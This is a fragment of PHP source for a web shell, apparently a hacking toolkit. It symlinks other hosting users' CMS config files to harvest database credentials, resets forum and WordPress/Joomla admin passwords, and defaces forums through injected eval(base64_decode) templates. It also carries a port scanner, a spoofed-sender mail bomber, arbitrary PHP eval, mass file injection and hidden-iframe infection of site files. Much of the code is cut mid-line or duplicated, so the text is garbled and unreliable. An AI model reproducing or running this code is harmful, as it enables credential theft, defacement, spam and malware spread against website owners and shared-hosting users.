symlink('/home/'.$usern.'/public_html/blog/wp-config.php
',$pdomain.'~~Wordpress2.txt');
symlink('/home/'.$usern.'/public_html/configuration.php'
,$pdomain.'~~Joomla1.txt');
symlink('/home/'.$usern.'/public_html/blog/configuration
.php',$pdomain.'~~Joomla2.txt');
symlink('/home/'.$usern.'/public_html/joomla/configurati
on.php',$pdomain.'~~Joomla3.txt');
symlink('/home/'.$usern.'/public_html/whm/configuration.
php',$pdomain.'~~Whm1.txt');
symlink('/home/'.$usern.'/public_html/whmc/configuration
.php',$pdomain.'~~Whm2.txt');
symlink('/home/'.$usern.'/public_html/support/configurat
ion.php',$pdomain.'~~Whm3.txt');
symlink('/home/'.$usern.'/public_html/client/configurati
on.php',$pdomain.'~~Whm4.txt');
symlink('/home/'.$usern.'/public_html/billings/configura
tion.php',$pdomain.'~~Whm5.txt');
symlink('/home/'.$usern.'/public_html/billing/configurat
symlink('/home/'.$usern.'/public_html/clients/configurat
symlink('/home/'.$usern.'/public_html/whmcs/configuratio
n.php',$pdomain.'~~Whm8.txt');
symlink('/home/'.$usern.'/public_html/order/configuratio
symlink('/home/'.$usern.'/public_html/admin/conf.php',$p
domain.'~~5.txt');
symlink('/home/'.$usern.'/public_html/admin/config.php',
$pdomain.'~~4.txt');
symlink('/home/'.$usern.'/public_html/conf_global.php',$
pdomain.'~~invisio.txt');
symlink('/home/'.$usern.'/public_html/include/db.php',$p
domain.'~~7.txt');
symlink('/home/'.$usern.'/public_html/connect.php',$pdom
ain.'~~8.txt');
symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdom
ain.'~~mk-portale1.txt');
symlink('/home/'.$usern.'/public_html/include/config.php
',$pdomain.'~~12.txt');
symlink('/home/'.$usern.'/public_html/settings.php',$pdo
main.'~~Smf.txt');
symlink('/home/'.$usern.'/public_html/includes/functions
.php',$pdomain.'~~phpbb3.txt');
symlink('/home/'.$usern.'/public_html/include/db.php',$p
domain.'~~infinity.txt');
symlink('/home2/'.$usern.'/public_html/vb/includes/confi
g.php',$pdomain.'~~vBulletin1.txt');
symlink('/home2/'.$usern.'/public_html/includes/config.p
hp',$pdomain.'~~vBulletin2.txt');
symlink('/home2/'.$usern.'/public_html/forum/includes/co
nfig.php',$pdomain.'~~vBulletin3.txt');
symlink('/home2/'.$usern.'/public_html/cc/includes/confi
symlink('/home2/'.$usern.'/public_html/inc/config.php',$
pdomain.'~~mybb.txt');
symlink('/home2/'.$usern.'/public_html/config.php',$pdom
ain.'~~Phpbb1.txt');
nfig.php',$pdomain.'~~Phpbb2.txt');
symlink('/home2/'.$usern.'/public_html/conf_global.php',
$pdomain.'~~ipb2.txt');
symlink('/home2/'.$usern.'/public_html/wp-config.php',$p
domain.'~~Wordpress1.txt');
symlink('/home2/'.$usern.'/public_html/blog/wp-config.ph
p',$pdomain.'~~Wordpress2.txt');
symlink('/home2/'.$usern.'/public_html/configuration.php
',$pdomain.'~~Joomla1.txt');
symlink('/home2/'.$usern.'/public_html/blog/configuratio
n.php',$pdomain.'~~Joomla2.txt');
symlink('/home2/'.$usern.'/public_html/joomla/configurat
ion.php',$pdomain.'~~Joomla3.txt');
symlink('/home2/'.$usern.'/public_html/whm/configuration
symlink('/home2/'.$usern.'/public_html/whmc/configuratio
symlink('/home2/'.$usern.'/public_html/support/configura
symlink('/home2/'.$usern.'/public_html/client/configurat
symlink('/home2/'.$usern.'/public_html/billings/configur
ation.php',$pdomain.'~~Whm5.txt');
symlink('/home2/'.$usern.'/public_html/billing/configura
symlink('/home2/'.$usern.'/public_html/clients/configura
symlink('/home2/'.$usern.'/public_html/whmcs/configurati
symlink('/home2/'.$usern.'/public_html/order/configurati
symlink('/home2/'.$usern.'/public_html/admin/conf.php',$
pdomain.'~~5.txt');
symlink('/home2/'.$usern.'/public_html/admin/config.php'
,$pdomain.'~~4.txt');
$pdomain.'~~invisio.txt');
symlink('/home2/'.$usern.'/public_html/include/db.php',$
pdomain.'~~7.txt');
symlink('/home2/'.$usern.'/public_html/connect.php',$pdo
main.'~~8.txt');
symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdo
main.'~~mk-portale1.txt');
symlink('/home2/'.$usern.'/public_html/include/config.ph
p',$pdomain.'~~12.txt');
symlink('/home2/'.$usern.'/public_html/settings.php',$pd
omain.'~~Smf.txt');
symlink('/home2/'.$usern.'/public_html/includes/function
s.php',$pdomain.'~~phpbb3.txt');
pdomain.'~~infinity.txt');
pdomain.'~~5.txt');
pdomain.'~~7.txt');
main.'~~8.txt');
omain.'~~Smf.txt');
pdomain.'~~5.txt');
pdomain.'~~7.txt');
main.'~~8.txt');
omain.'~~Smf.txt');
pdomain.'~~5.txt');
pdomain.'~~7.txt');
main.'~~8.txt');
omain.'~~Smf.txt');
pdomain.'~~5.txt');
pdomain.'~~7.txt');
main.'~~8.txt');
omain.'~~Smf.txt');
pdomain.'~~5.txt');
pdomain.'~~7.txt');
main.'~~8.txt');
omain.'~~Smf.txt');
}
if(isset($_REQUEST['passwd']))
{
$getetc = trim($_REQUEST['passwd']);
mkdir("dhanushSPT");
chdir("dhanushSPT");
$myfile = fopen("test.txt","w");
fputs($myfile,$getetc);
fclose($myfile);
$file = fopen("test.txt", "r") or exit("Unable to open f
ile!");
while(!feof($file))
{
$s = fgets($file);
$matches = array();
$t = preg_match('/\/(.*?)\:\//s', $s, $matches);
$matches = str_replace("home/","",$matches[1]);
if(strlen($matches) > 12 || strlen($matches) ==
0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs"
|| $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin"
|| $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" ||
$matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
continue;
syml($matches,$matches);
}
fclose($file);
unlink("test.txt");
echo "<center><font class=txt size=3>[ Done ]</font></ce
nter>";
echo "<br><center><a href=".$url."dhanushSPT target=_bla
nk><font size=3 color=#009900>| Go Here |</font></a></center>";
}
else
{
$d0mains = @file("/etc/named.conf");
if($d0mains)
{
mkdir("dhanushST");
chdir("dhanushST");
foreach($d0mains as $d0main)
{
if(eregi("zone",$d0main))
{
preg_match_all('#zone "(.*)"#', $d0main,
$domains);
flush();
if(strlen(trim($domains[1][0])) > 2)
{
$user = posix_getpwuid(@fileowne
r("/etc/valiases/".$domains[1][0]));
syml($user['name'],$domains[1][0
]);
}
}
}
nter>";
echo "<br><center><a href=".$url."dhanushST target=_blan
k><font size=3 color=#009900>| Go Here |</font></a></center>";
}
else
{
mkdir("dhanushSPT");
chdir("dhanushSPT");
$temp = "";
$val1 = 0;
$val2 = 1000;
for(;$val1 <= $val2;$val1++)
{
$uid = @posix_getpwuid($val1);
if ($uid)
$temp .= join(':',$uid)."\n";
}
echo '<br/>';
$temp = trim($temp);
$file5 = fopen("test.txt","w");
fputs($file5,$temp);
fclose($file5);
$file = fopen("test.txt", "r") or exit("Unable to open
file!");
while(!feof($file))
{
$s = fgets($file);
$matches = array();

$matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
continue;
syml($matches,$matches);
}
fclose($file);
echo "</table>";
unlink("test.txt");
nter>";
echo "<br><center><a href=".$url."dhanushSPT target=_bla
nk><font size=3 color=#009900>| Go Here |</font></a></center>";
}
}
}
else
echo "<center>Cannot Complete the task!!!!</center>";
}
else if(isset($_GET["symlinkfile"]))
{
if(!isset($_GET['file']))
{
?>
<center>
<form onSubmit="getdata('symlinkmyfile',file.value);retu
rn false;">
<input type="text" class="box" name="file" size="50" val
ue="/etc/passwd">
<input type="button" value="Create Symlink" onClick="get
data('symlinkmyfile',file.value)" class="but">
</form></center>
<br><br>
<?php
}
}
else if(isset($_GET['symlinkmyfile']))
{
{
$fakedir="cx";
$fakedep=16;
$num=0; // offset of symlink.$num
if(!empty($_GET['myfile']))
$file=$_GET['myfile'];
else $file="";
if(empty($file))
exit;
if(!is_writable("."))
echo "not writable directory";

$level=0;
for($as=0;$as<$fakedep;$as++)
{
if(!file_exists($fakedir))
mkdir($fakedir);
chdir($fakedir);
}
while(1<$as--) chdir("..");
$hardstyle = explode("/", $file);
for($a=0;$a<count($hardstyle);$a++)
{
if(!empty($hardstyle[$a]))
{
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$as++;
}
}
$as++;
while($as--)
chdir("..");
@rmdir("fakesymlink");
@unlink("fakesymlink");
@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink"
);
while(1)
if(true==(@symlink("fakesymlink/".str_repeat("../",$fake
dep-1).$file, "symlink".$num))) break;
else $num++;
@unlink("fakesymlink");
mkdir("fakesymlink");
echo '<CENTER>check symlink <a href="./symlink'.$num.'">
symlink'.$num.'</a> file</CENTER>';
}
else
echo '<CENTER>Cannot Create Symlink</CENTER>';
}
else if(isset($_REQUEST['404new']))
{
?>
<form>
<center><textarea name=message cols=100 rows=18 class=box>lol! You just
got hacked</textarea></br>
<input type="button" onClick="my404page(message.value)" value=" Save "
class=but></center>
</br>
</form>
<?php
}
else if(isset($_REQUEST['404page']))
{
$url = $_SERVER['REQUEST_URI'];
if(isset($_POST['message']))
{
if($myfile = fopen(".htaccess", "a"))
{
fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r
");
if($myfilee = fopen("404.html", "w+"))
{
fwrite($myfilee, $_POST['message']);
}
echo "<center><font class=txt>Done setting 404 Page !!!!
</font></center>";
}
else
echo "<center>Cannot Set 404 Page</center>";
}
else if(strlen($ind) != 0)
{
if($myfile = fopen(".htaccess", "a"))
{
fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r
");
if($myfilee = fopen("404.html", "w+"))
{
fwrite($myfilee, base64_decode($ind));
fclose($myfilee);
echo "<center><font class=txt>Done setting 404 P
age !!!!</font></center>";
}
fclose($myfile);
}
else
{
echo "<center>Cannot Set 404 Page</center>";
}
}
else
echo "<center>Nothing Specified in the shell</center>";
}
else if(isset($_GET["domains"]))
{
?><center><iframe src="<?php echo 'http://sameip.org/ip/' . getenv('SERV
ER_ADDR'); ?>" width="80%" height="1000px"></iframe></center><?php
}
else if(isset($_GET["symlink"]))
{
$d0mains = @file("/etc/named.conf");
$url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
if($d0mains)
{
@mkdir("dhanush",0777);
@chdir("dhanush");
execmd("ln -s / root");
$file3 = 'Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
';
$fp3 = fopen('.htaccess','w');
$fw3 = fwrite($fp3,$file3);
@fclose($fp3);
echo "<table align=center border=1 style='width:60%;border-color
:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><t
d align=center><font size=3 >Domains</font></td><td align=center><font size=3 >U
sers</font></td><td align=center><font size=3 >Symlink</font></td><td align=cent
er><font size=3 >Information</font></td></tr>";
$dcount = 1;
{
if(eregi("zone",$d0main))
{
preg_match_all('#zone "(.*)"#', $d0main, $domain
s);
flush();
{
$user = posix_getpwuid(@fileowner("/etc/
valiases/".$domains[1][0]));
echo "<tr align=center><td><font class=t
xt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]
."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$use
r['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/p
ublic_html target='_blank'><font class=txt>Symlink</font></a></td><td><font clas
s=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>";
flush();
$dcount++;
}
}
}
echo "</table>";
}
else
{
{
?>
<div style="float:left;position:fixed;">
<form>
<table cellpadding="9">
<tr>
<th colspan="2">Get User Name</th>
</tr>
<tr>
<td>Enter Website Name :</td>
<td><input type="text" name="sitename" v
alue="sitename.com" class="sbox"></td>
</tr>
<tr>
<td align="center" colspan="2"><input ty
pe="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></
td>
</tr>
<tr>
<td colspan=2 align=center><div style="w
idth:250px;" id="showsite"></div></td>
</tr>
</table>
</form>
</div>
<?php
$TEST=@file('/etc/passwd');
if ($TEST)
{
@chdir("dhanush");
Require None
Satisfy Any
';
@fclose($fp3);
echo "<table align=center border=1 style='width:
40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td>
<td align=center><font size=4 >Users</font></td><td align=center><font size=3 >S
ymlink</font></td></tr>";
$dcount = 1;
$file = fopen("/etc/passwd", "r");
//Output a line of the file until the end is rea
ched
while(!feof($file))
{
$s = fgets($file);
$matches = array();
$t = preg_match('/\/(.*?)\:\//s', $s, $m
atches);
$matches = str_replace("home/","",$match
es[1]);
hes) ==
ib/nfs"
"sbin"
ftp" ||
")
if(strlen($matches) > 12 || strlen($matc

0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/l
|| $matches == "var/arpwatch" || $matches == "var/gopher" || $matches ==
|| $matches == "var/adm" || $matches == "usr/games" || $matches == "var/
$matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named
continue;
echo "<tr><td align=center><font size=3
class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $match
es . "</td>";
echo "<td align=center><font size=3 clas
s=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_bl
ank'>Symlink</a></td></tr>";
$dcount++;
}
fclose($file);
echo "</table>";
}
else
{
@chdir("dhanush");
Require None
Satisfy Any
';
@fclose($fp3);
echo "<table align=center border=1 style='width:
40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td>
<td align=center><font size=4 >Users</font></td><td align=center><font size=3 >S
ymlink</font></td></tr>";
$temp = "";
$val1 = 0;
$val2 = 1000;
{
$uid = @posix_getpwuid($val1);
if ($uid)
}
echo '<br/>';
$file5 = fopen("test.txt","w");
fclose($file5);
$dcount = 1;
$file = fopen("test.txt", "r");
while(!feof($file))
{
$s = fgets($file);
$matches = array();
$t = preg_match('/\/(.*?)\:\//s', $s, $m
atches);
$matches = str_replace("home/","",$match
es[1]);
hes) ==
ib/nfs"
"sbin"
ftp" ||
")
if(strlen($matches) > 12 || strlen($matc

0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/l
|| $matches == "var/arpwatch" || $matches == "var/gopher" || $matches ==
|| $matches == "var/adm" || $matches == "usr/games" || $matches == "var/
$matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named
continue;
echo "<tr><td align=center><font size=3
class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $match
es . "</td>";
echo "<td align=center><font size=3 clas
s=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_bl
ank'>Symlink</a></td></tr>";
$dcount++;
}
fclose($file);
echo "</table>";
unlink("test.txt");
}
}
else
echo "<center><font size=4 >Cannot create Symlink</font>
</center>";
}
}
else if(isset($_GET['host']) && isset($_GET['protocol']))
{
echo "Open Ports: ";
$host = $_GET['host'];
$proto = $_GET['protocol'];
$myports = array("21","22","23","25","59","80","113","135","445","1025",
"5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","70
00","8080","8018");
for($current = 0; $current <= 23; $current++)
{
$currents = $myports[$current];
$service = getservbyport($currents, $proto);
// Try to connect to port
$result = fsockopen($host, $currents, $errno, $errstr, 1);
// Show results
if($result)
echo "<font class=txt>$currents, </font>";
}
}
else if(isset($_REQUEST['forumpass']))
{
$localhost = $_GET['f1'];
$database = $_GET['f2'];
$username = $_GET['f3'];
$password = $_GET['f4'];
$prefix
= $_GET['prefix'];
$newpass = $_GET['newpass'];
$uid = $_GET['uid'];
if($_GET['forums'] == "vb")
{
$newpass = $_GET['newipbpass'];
$uid = $_GET['ipbuid'];
$con = mysql_connect($localhost,$username,$password);
$db = mysql_select_db($database,$con);
$salt = "eghjghrtd";
$newpassword = md5(md5($newpass) . $salt);
if($prefix == "" || $prefix == null)
$sql = mysql_query("update user set password = '
$newpassword', salt = '$salt' where userid = '$uid'");
else
$sql = mysql_query("update ".$prefix."user set p
assword = '$newpassword', salt = '$salt' where userid = '$uid'");
if($sql)
{
mysql_close($con);
echo "<font class=txt>Password Changed Successfu
lly</font>";
}
else
echo "Cannot Change Password";
}
else if($_GET['forums'] == "mybb")
{
$salt = "jeghj";
$newpassword = md5(md5($salt).md5($newpass));
$sql = mysql_query("update mybb_users set passwo
rd = '$newpassword', salt = '$salt' where uid = '$uid'");
else
$sql = mysql_query("update ".$prefix."users set
password = '$newpassword', salt = '$salt' where uid = '$uid'");
if($sql)
{
mysql_close($con);
lly</font>";
}
else
}
else if($_GET['forums'] == "smf")
{
{
$result = mysql_query("select member_name from s
mf_members where id_member = $uid");
$row = mysql_fetch_array($result);
$membername = $row['member_name'];
$newpassword = sha1(strtolower($membername).$new
pass);
$sql = mysql_query("update smf_members set passw
d = '$newpassword' where id_member = '$uid'");
}
else
{
$result = mysql_query("select member_name from "
.$prefix."members where id_member = $uid");
$row = mysql_fetch_array($result);
$membername = $row['member_name'];
$newpassword = sha1(strtolower($membername).$new
pass);
$sql = mysql_query("update ".$prefix."members se
t passwd = '$newpassword' where id_member = '$uid'");
}
if($sql)
{
mysql_close($con);
lly</font>";
}
else
}
else if($_GET['forums'] == "phpbb")
{
$newpass = $_POST['newipbpass'];
$uid = $_POST['ipbuid'];
$newpassword = md5($newpass);
if(empty($prefix) || $prefix == null)
$sql = mysql_query("update phpb_users set user_p
assword = '$newpassword' where user_id = '$uid'");
else
user_password = '$newpassword' where user_id = '$uid'");
if($sql)
{
mysql_close($con);
lly</font>";
}
else
}
else if($_GET['forums'] == "ipb")
{
$newpass = $_POST['newipbpass'];
$uid = $_POST['ipbuid'];
$salt = "eghj";
$newpassword = md5(md5($salt).md5($newpass));
$sql = mysql_query("update members set members_p
ass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'"
);
else
$sql = mysql_query("update ".$prefix."members se
t members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_i
d = '$uid'");
if($sql)
{
mysql_close($con);
lly</font>";
}
else
}
else if($_GET['forums'] == "wp")
{
$uname = $_GET['uname'];
$newpassword = md5($newpass);
$sql = mysql_query("update wp_users set user_pas
s = '$newpassword', user_login = '$uname' where ID = '$uid'");
else
user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
if($sql)
{
mysql_close($con);
lly</font>";
}
else
}
else if($_GET['forums'] == "joomla")
{
$newjoomlapass = $_GET['newjoomlapass'];
$joomlauname = $_GET['username'];
$newpassword = md5($newjoomlapass);
$sql = mysql_query("update jos_users set passwor
d = '$newpassword', username = '$joomlauname' where name = 'Super User'");
else
password = '$newpassword', username = '$joomlauname' where name = 'Super User' O
R name = 'Administrator'");
if($sql)
{
mysql_close($con);
lly</font>";
}
else
}
}
else if(isset($_POST['forumdeface']))
{
$localhost = $_POST['f1'];
$database = $_POST['f2'];
$username
$password
$index
$prefix
= $_POST['f3'];
= $_POST['f4'];
= $_POST['index'];
= $_POST['tableprefix'];
if($_POST['forumdeface'] == "vb")
{
$con =@ mysql_connect($localhost,$username,$password);
$db =@ mysql_select_db($database,$con);
$index=str_replace('"','\\"',$index);
$attack = "{\${eval(base64_decode(\'";
$attack .= base64_encode("echo \"$index\";");
$attack .= "\'))}}{\${exit()}}</textarea>";
$query = "UPDATE template SET template = '$attac
k'";
else
$query = "UPDATE ".$prefix."template SET template = '$at
tack'";
$result =@ mysql_query($query,$con);
if($result)
echo "<center><font class=txt size=4><blink>Vbulletin Fo
rum Defaced Successfully</blink></font></center>";
else
echo "<center><font size=4><blink>Cannot Deface Vbullet
in Forum</blink></font></center>";
}
else if($_POST['forumdeface'] == "mybb")
{
$attack = "{\${eval(base64_decode(\'";
$attack .= base64_encode("echo \"$index\";");
$attack .= "\'))}}{\${exit()}}</textarea>";
$attack = str_replace('"',"\\'",$attack);
$query = "UPDATE mybb_templates SET template = '$attack'
";
else
$query = "UPDATE ".$prefix."templates SET template = '$attack'";
if($result)
echo "<center><font class=txt size=4><blink>Mybb Forum D
efaced Successfully</blink></font></center>";
else
echo "<center><font size=4><blink>Cannot Deface Mybb Fo
rum</blink></font></center>";
}
else if($_POST['forumdeface'] == "smf")
{
$head
= $_POST['head'];
$catid
= $_POST['f5'];
$query = "UPDATE boards SET name='$head', description='$
index' WHERE id_cat='$catid'";
else
$query = "UPDATE ".$prefix."boards SET name='$head', des

cription='$index' WHERE id_cat='$catid'";
if($result)
echo "<center><font class=txt size=4><blink>SMF Forum In
dex Changed Successfully</blink></font></center>";
else
echo "<center><font size=4><blink>Cannot Deface SMF For
um</blink></font></center>";
}
else if($_POST['forumdeface'] == "ipb")
{
$head
= $_POST['head'];
$catid
= $_POST['f5'];
$IPB = "forums";
$result =@mysql_query($query = "UPDATE $IPB SET name = '
$head', description = '$index' where id = '$catid'");
else
$result =@mysql_query($query = "UPDATE $prefix.$IPB SET
name = '$head', description = '$index' where id = '$catid'");
if($result)
echo "<center><font class=txt size=4><blink>Forum Deface
d Successfully</blink></font></center>";
else
echo "<center><font size=4><blink>Cannot Deface Forum</
blink></font></center>";
}
else if($_POST['forumdeface'] == "wp")
{
$catid = $_POST['f5'];
$head
= $_POST['head'];
{
if(isset($_POST["alll"]) && $_POST["alll"] == "All")
$query = "UPDATE wp_posts SET post_title='$head'
, post_content='$index'";
else
$query = "UPDATE wp_posts SET post_title='$head'
, post_content='$index' WHERE ID='$catid'";
}
else
{
if(isset($_POST["alll"]) && $_POST["alll"] == "All")
$query = "UPDATE ".$prefix."posts SET post_title
='$head', post_content='$index'";
else
$query = "UPDATE ".$prefix."posts SET post_title
='$head', post_content='$index' WHERE ID='$catid'";
}
$result =@mysql_query($query,$con) or mysql_error();
if($result)
echo "<center><font class=txt size=4><blink>Wordpress De
faced Successfully</blink></font></center>";
else
echo "<center><font size=4><blink>Cannot Deface Wordpre
ss</blink></font></center>";
}
else if($_POST['forumdeface'] == "joomla")
{
$site_url = $_POST['siteurl'];
$dbprefix = $_POST['tableprefix'];
$dbname = $_POST['f2'];
$h="<? echo(stripslashes(base64_decode('".urlencode(base64_encod
e(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
function randomt()
{
$chars = "abcdefghijkmnopqrstuvwxyz023456789";
srand((double)microtime()*1000000);
$i = 0;
$pass = '' ;
while ($i <= 7)
{
$num = rand() % 33;
$tmp = substr($chars, $num, 1);
$pass = $pass . $tmp;
$i++;
}
return $pass;
}
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1
)
{
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[$i]);
$ar=trim($ar1[0]);
return $ar;
}
$co=randomt();
$link=mysql_connect($localhost,$username,$password) ;
mysql_select_db($dbname,$link);
$tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET usernam
e ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsU
ENrKOmZtAX'");
$req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
if ( $req )
{
$req =mysql_query("SELECT * from `".$dbprefix."template
_styles` WHERE client_id='0' and home='1'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
$req =mysql_query("SELECT * from `".$dbprefix."extensio
ns` WHERE name='".$template_name."'");
$template_id=$data["extension_id"];
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$return=entre2v2($buffer ,'<input type="hidden" name="re
turn" value="','"');
$hidden=entre2v2($buffer ,'<input type="hidden" name="',
'" value="1"',4);
$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&pass
wd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
$pos = strpos($buffer,"com_config");
if($pos === false)
{
echo("<br>[-] Login Error");
exit;
}
$url2=$site_url."/index.php?option=com_templates&task=so
urce.edit&id=".base64_encode($template_id.":index.php");
$ch = curl_init();
$hidden2=entre2v2($buffer ,'<input type="hidden" name="'
,'" value="1"',2);
if(!$hidden2)
{
echo("<br>[-] index.php Not found in Theme Edito

r");
exit;
}
$url2=$site_url."/index.php?option=com_templates&layout=
edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h.
"&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&
task=source.save");
$pos = strpos($buffer,'<dd class="message message">');
if($pos === false)
{
echo("<center><font size=4><blink>Cannot Deface
Joomla</blink></font></center>");
}
else
{
echo("<center><font class=txt size=4><blink>Joom
la Defaced Successfully</blink></font></center>");
}
}
else
{
$req =mysql_query("SELECT * from `".$dbprefix."template
s_menu` WHERE client_id='0'");
$template_name=$data["template"];
$ch = curl_init();
$hidden=entre2v2($buffer ,'<input type="hidden" name="',
'" value="1"',3);
$ch = curl_init();
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&pass
wd=123456789&option=com_login&task=login&".$hidden."=1");
$pos = strpos($buffer,"com_config");
if($pos === false)
{
echo("<br>[-] Login Error");
exit;
}
$url2=$site_url."/index.php?option=com_templates&task=ed
it_source&client=0&id=".$template_name;
$ch = curl_init();
$hidden2=entre2v2($buffer ,'<input type="hidden" name="'
,'" value="1"',6);
if(!$hidden2)
{
echo("<br>[-] index.php Not found in Theme Edito
r");
}
$url2=$site_url."/index.php?option=com_templates&layout=
edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&
id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&c
lient=0");
$pos = strpos($buffer,'<dd class="message message fade">
');
if($pos === false)
{
echo("<center><font size=4><blink>Cannot Deface
Joomla</blink></font></center>");
exit;
}
else
{
echo("<center><font class=txt size=4><blink>Joom
la Defaced Successfully</blink></font></center>");
}
}
}
}
else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_P
OST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_PO
ST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
{
$filetype = $_POST['filetype'];
$mode = "a";
if($_POST['mode'] == 'Apender')
$mode = "a";
if($_POST['mode'] == 'Overwriter')
$mode = "w";
if (is_dir($_POST['pathtomass']))
{
$lolinject = $_POST['injectthis'];
$mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filety
pe;
if(substr($_POST['pathtomass'], -1) == "\\")
$mypath = $_POST['pathtomass'] . "*.".$filetype;
foreach (glob($mypath) as $injectj00)
{
if($injectj00 == __FILE__)
continue;
$fp=fopen($injectj00,$mode);
if (fputs($fp,$lolinject))
echo '<br><font class=txt size=3>'.$injectj00.'
was injected<br></font>';
else
echo 'failed to inject '.$injectj00.'<br>';
}
}
else
echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
}
else if(isset($_POST['mailfunction']))
{
if($_POST['mailfunction'] == "dobombing")
{
if(isset($_POST['to']) && isset($_POST['subject']) && isset($_PO
ST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subjec
t'] != '' &&
$_POST['message'] != '' && $_POST['times'] != ''
)
{
$times = $_POST['times'];
while($times--)
{
if(isset($_POST['padding']))
{
$fromPadd = rand(0,9999);
$subjectPadd = " -- ID : ".rand(0,999999
9);
$messagePadd = "\n\n-----------------------------\n".rand(0,99999999);
}
$from = "president$fromPadd@whitehouse.gov";
if(!mail($_POST['to'],$_POST['subject'].$subject
Padd,$_POST['message'].$messagePadd,"From:".$from))
{
$error = 1;
echo "<center><font size=3><blink><blin
k>Some Error Occured!</blink></font></center>";
break;
}
}
if($error != 1)
echo "<center><font class=txt size=3><blink>Mail
(s) Sent!</blink></font></center>";
}
}
else if($_POST['mailfunction'] == "massmailing")
{
if(isset($_POST['to']) && isset($_POST['from']) && isset($_POS
T['subject']) && isset($_POST['message']))
{
if(mail($_POST['to'],$_POST['subject'],$_POST['message']
,"From:".$_POST['from']))
echo "<center><font class=txt size=3><blink>Mail Sent!</blin
k></font></center>";
else
echo "<center><font size=3><blink>Some Error Occured!</blin
k></font></center>";
}
}
}
else if(isset($_POST['code']))
{
if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext']
== "true")
{
// FIlter Some Chars we dont need
?><br>
<textarea name="code" class="box" cols="120" rows="10"><?php
$code = str_replace("<?php","",$_POST['code']);
$code = str_replace("<?","",$code);
$code = str_replace("?>","",$code);
// Evaluate PHP CoDE!
htmlspecialchars(eval($code));
?>
</textarea><?php
}
else if($_POST['code'] != null && $_POST['intext'] == "false")
{
$code = str_replace("<?php","",$_POST['code']);
$code = str_replace("<?","",$code);
$code = str_replace("?>","",$code);
// Evaluate PHP CoDE!

?><br><font size="4">Result of execution this PHP-code :</font>
<br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
}
}
else if(isset($_GET['infect']))
{
$coun = 0;
$str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$m
alsite."> </iframe>";
foreach (glob($_GET['path'] . "*.php") as $injectj00)
{
if($injectj00 == __FILE__)
continue;
if($myfile=fopen($injectj00,'a'))
{
fputs($myfile, $str);
fclose($myfile);
$coun = 1;
}
}
foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
{
{
fclose($myfile);
$coun = 1;
}
}
foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj
00)
{
{
fclose($myfile);
$coun = 1;
}
